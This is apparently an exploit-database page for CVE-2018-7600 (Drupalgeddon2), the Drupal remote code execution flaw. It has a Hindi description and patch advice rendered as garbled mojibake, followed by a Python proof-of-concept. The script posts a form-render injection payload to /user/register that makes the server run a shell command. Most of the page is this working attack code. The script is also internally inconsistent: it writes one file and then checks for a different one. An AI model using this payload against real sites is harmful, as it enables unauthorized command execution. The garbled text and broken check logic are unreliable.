Sploitus

Exploit for CVE-2018-7600.

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN55 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TPDLSHDMLRKFMCLA-CVE-2018-7600.
## IGLOO Corp, Won Chi Hyun Drupal RCE рд╡рд┐рд╢реНрд▓реЗрд╖рдг рд░рд┐рдкреЛрд░реНрдЯ

Drupal RCE CVE-2018-7600

рдЕрдкрдиреЗ рдкрддреЗ рдХреЛ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдореЗрдВ рдбрд╛рд▓рдирд╛ рди рднреВрд▓реЗрдВ! рд╡рд┐рд╡рд░рдг: рдПрдХ рд░рд┐рдореЛрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди рднреЗрджреНрдпрддрд╛ Drupal 7.x рдФрд░ 8.x рдХреЗ рдХрдИ рдЙрдк-рдкреНрд░рдгрд╛рд▓рд┐рдпреЛрдВ рдореЗрдВ рдореМрдЬреВрдж рд╣реИред рдпрд╣ рд╕рдВрднрд╛рд╡рд┐рдд рд░реВрдк рд╕реЗ рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдХреЛ Drupal рд╕рд╛рдЗрдЯ рдкрд░ рдХрдИ рдЖрдХреНрд░рдордг рд╡реИрдХреНрдЯрд░реЛрдВ рдХрд╛ рд╢реЛрд╖рдг рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ, рдЬрд┐рд╕рдХреЗ рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк рд╕рд╛рдЗрдЯ рдкреВрд░реА рддрд░рд╣ рд╕реЗ рд╕рдордЭреМрддрд╛ рд╣реЛ рд╕рдХрддреА рд╣реИред

рд╕рдорд╛рдзрд╛рди: Drupal 7 рдпрд╛ 8 рдХреЛрд░ рдХреЗ рдирд╡реАрдирддрдо рд╕рдВрд╕реНрдХрд░рдг рдореЗрдВ рдЕрдкрдЧреНрд░реЗрдб рдХрд░реЗрдВред

рдпрджрд┐ рдЖрдк 7.x рдЪрд▓рд╛ рд░рд╣реЗ рд╣реИрдВ, рддреЛ Drupal 7.58 рдореЗрдВ рдЕрдкрдЧреНрд░реЗрдб рдХрд░реЗрдВред (рдпрджрд┐ рдЖрдк рддреБрд░рдВрдд рдЕрдкрдбреЗрдЯ рдХрд░рдиреЗ рдореЗрдВ рдЕрд╕рдорд░реНрде рд╣реИрдВ, рддреЛ рдЖрдк рдЬрдм рддрдХ рдкреВрд░реА рддрд░рд╣ рд╕реЗ рдЕрдкрдбреЗрдЯ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рдирд╣реАрдВ рд╣реЛ рдЬрд╛рддреЗ, рддрдм рддрдХ рднреЗрджреНрдпрддрд╛ рдХреЛ рдареАрдХ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЗрд╕ рдкреИрдЪ рдХреЛ рд▓рд╛рдЧреВ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред) рдпрджрд┐ рдЖрдк 8.5.x рдЪрд▓рд╛ рд░рд╣реЗ рд╣реИрдВ, рддреЛ Drupal 8.5.1 рдореЗрдВ рдЕрдкрдЧреНрд░реЗрдб рдХрд░реЗрдВред (рдпрджрд┐ рдЖрдк рддреБрд░рдВрдд рдЕрдкрдбреЗрдЯ рдХрд░рдиреЗ рдореЗрдВ рдЕрд╕рдорд░реНрде рд╣реИрдВ, рддреЛ рдЖрдк рдЬрдм рддрдХ рдкреВрд░реА рддрд░рд╣ рд╕реЗ рдЕрдкрдбреЗрдЯ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рдирд╣реАрдВ рд╣реЛ рдЬрд╛рддреЗ, рддрдм рддрдХ рднреЗрджреНрдпрддрд╛ рдХреЛ рдареАрдХ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЗрд╕ рдкреИрдЪ рдХреЛ рд▓рд╛рдЧреВ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред)

root@kitploit:~
    
    
    #!/usr/bin/python2.7
    '''_____________________________________________________________________
    |[] R3DXPL0IT SHELL                                            |ROOT]|!"|
    |"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"| 
    |CODED BY > R3DXPLOIT(JIMMY)                                          | |
    |EMAIL > some-email@example.com                                   | |
    |GITHUB > https://github.com/r3dxpl0it                                | |
    |WEB-PAGE > https://r3dxpl0it.Github.io                               |_|
    |_____________________________________________________________________|/|
    '''
    '''
    https://nvd.nist.gov/vuln/detail/CVE-2018-7600#
    https://vulners.com/cve/CVE-2018-7600
    '''
    import sys
    import requests
    
    def exploit(target):
        pass
        proxies = {}
        verify = False
    
        payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "vulnerable to cve-7600-2018 exploit" | tee r3dxploit.txt'}
        url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
        print ( '[*]' + ' requesting post')
        r = requests.post(url, proxies=proxies, data=payload, verify=verify)
        try:
            scan = requests.get(target + 'vulnerable.txt')
            if scan.status_code != 200:
               print ( ' not vulnerable to cve-2018-7600 exploit \n')
            if scan.status_code == 200:
               print (' vulnerable to cve-2018-7600 exploit')
               print (' url: ' + target + 'vulnerable.txt \n')
        except requests.ConnectionError:
            print (' target connection timeout')
        except Exception as e :
            print ('Connction Failed ' + e )
    				
    
    if __name__ == '__main__':
       exploit(sys.argv[1])